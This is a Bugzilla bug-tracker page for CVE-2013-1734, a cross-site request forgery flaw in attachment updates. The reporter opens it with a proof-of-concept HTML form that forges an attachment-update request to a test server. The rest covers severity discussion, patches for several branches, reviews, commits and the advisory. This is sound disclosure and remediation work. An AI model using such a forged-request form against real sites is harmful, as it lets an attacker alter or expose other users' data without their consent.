Last Comment Bug 913904 - (CVE-2013-1734) [SECURITY] CSRF when updating attachments
(CVE-2013-1734)
: [SECURITY] CSRF when updating attachments
Status: RESOLVED FIXED
: sec-high, wsec-csrf
Product: Bugzilla
Classification: Server Software
Component: Attachments & Requests (show other bugs)
: 2.16
: All All
: -- major (vote)
: Bugzilla 4.0
Assigned To: Frédéric Buclin
: default-qa
Mentors:
Depends on: 476603
Blocks: 912643
  Show dependency treegraph
 
Reported: 2013-09-08 03:52 PDT by Mateusz Goik
Modified: 2014-07-24 16:54 PDT (History)
4 users (show)
mail: approval+
mail: approval4.4+
LpSolit: blocking4.4.1+
mail: approval4.2+
LpSolit: blocking4.2.7+
mail: approval4.0+
LpSolit: blocking4.0.11+
dveditz: sec‑bounty+
See Also:
QA Whiteboard:
Iteration: ---
Points: ---


Attachments
patch for 4.4 and trunk, v1 (1.92 KB, patch)
2013-09-08 09:13 PDT, Frédéric Buclin
dkl: review+
Details | Diff | Review
patch for 4.2, v1 (1.77 KB, patch)
2013-09-08 10:01 PDT, Frédéric Buclin
dkl: review+
Details | Diff | Review
patch for 4.0, v1 (2.48 KB, patch)
2013-09-08 10:20 PDT, Frédéric Buclin
dkl: review+
Details | Diff | Review

Description Mateusz Goik 2013-09-08 03:52:15 PDT
PoC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://landfill.bugzilla.org/bugzilla-tip/attachment.cgi" method="POST">
      <input type="hidden" name="id" value="3100" />
      <input type="hidden" name="action" value="update" />
      <input type="hidden" name="contenttypemethod" value="manual" />
      <input type="hidden" name="delta&#95;ts" value="xxxxxx" />
      <input type="hidden" name="token" value="xxxxx" />
      <input type="hidden" name="description" value="asdasd123" />
      <input type="hidden" name="filename" value="file&#95;21994&#46;txt" />
      <input type="hidden" name="contenttypeentry" value="text&#47;plain" />
      <input type="hidden" name="comment" value="asd" />
      <input type="hidden" name="flag&#95;type&#45;4" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;4" value="" />
      <input type="hidden" name="flag&#95;type&#45;1" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;1" value="" />
      <input type="hidden" name="flag&#95;type&#45;2" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;2" value="" />
      <input type="hidden" name="flag&#95;type&#45;3" value="X" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Comment 1 Frédéric Buclin 2013-09-08 09:13:45 PDT
Created attachment 801238 [details] [diff] [review]
patch for 4.4 and trunk, v1

This patch is similar to the one for process_bug.cgi.
Comment 2 Frédéric Buclin 2013-09-08 09:19:38 PDT
All versions are affected as bug 476603 was an incomplete fix.
Comment 3 Frédéric Buclin 2013-09-08 10:01:59 PDT
Created attachment 801248 [details] [diff] [review]
patch for 4.2, v1
Comment 4 Frédéric Buclin 2013-09-08 10:20:02 PDT
Created attachment 801251 [details] [diff] [review]
patch for 4.0, v1

I had to backport the invalid_timestamp error message which didn't exist before 4.2.
Comment 5 Daniel Veditz [:dveditz] 2013-09-08 12:09:15 PDT
Use CVE-2013-1734

Why sec-critical? This isn't compromising bugzilla in general. Beyond vandalism what's the worst you could do here? Luring a privileged user to un-hide an attachment maybe, revealing a security bug? My initial feel was moderate, but given hidden attachments I could live with sec-high.
Comment 6 David Lawrence [:dkl] 2013-09-10 13:09:41 PDT
Comment on attachment 801238 [details] [diff] [review]
patch for 4.4 and trunk, v1

Review of attachment 801238 [details] [diff] [review]:
-----------------------------------------------------------------

r=dkl
Comment 7 David Lawrence [:dkl] 2013-09-10 13:34:55 PDT
Comment on attachment 801248 [details] [diff] [review]
patch for 4.2, v1

Review of attachment 801248 [details] [diff] [review]:
-----------------------------------------------------------------

r=dkl
Comment 8 David Lawrence [:dkl] 2013-09-10 13:49:02 PDT
Comment on attachment 801251 [details] [diff] [review]
patch for 4.0, v1

Review of attachment 801251 [details] [diff] [review]:
-----------------------------------------------------------------

r=dkl
Comment 10 Frédéric Buclin 2013-10-16 10:11:23 PDT
Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/trunk/
modified attachment.cgi
Committed revision 8778.

Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/4.4/
modified attachment.cgi
Committed revision 8624.

Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/4.2/
modified attachment.cgi
Committed revision 8232.

Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/4.0/
modified attachment.cgi
modified template/en/default/global/code-error.html.tmpl
Committed revision 7760.
Comment 11 Frédéric Buclin 2013-10-17 07:58:45 PDT
Security advisory sent.

Note You need to log in before you can comment on or make changes to this bug.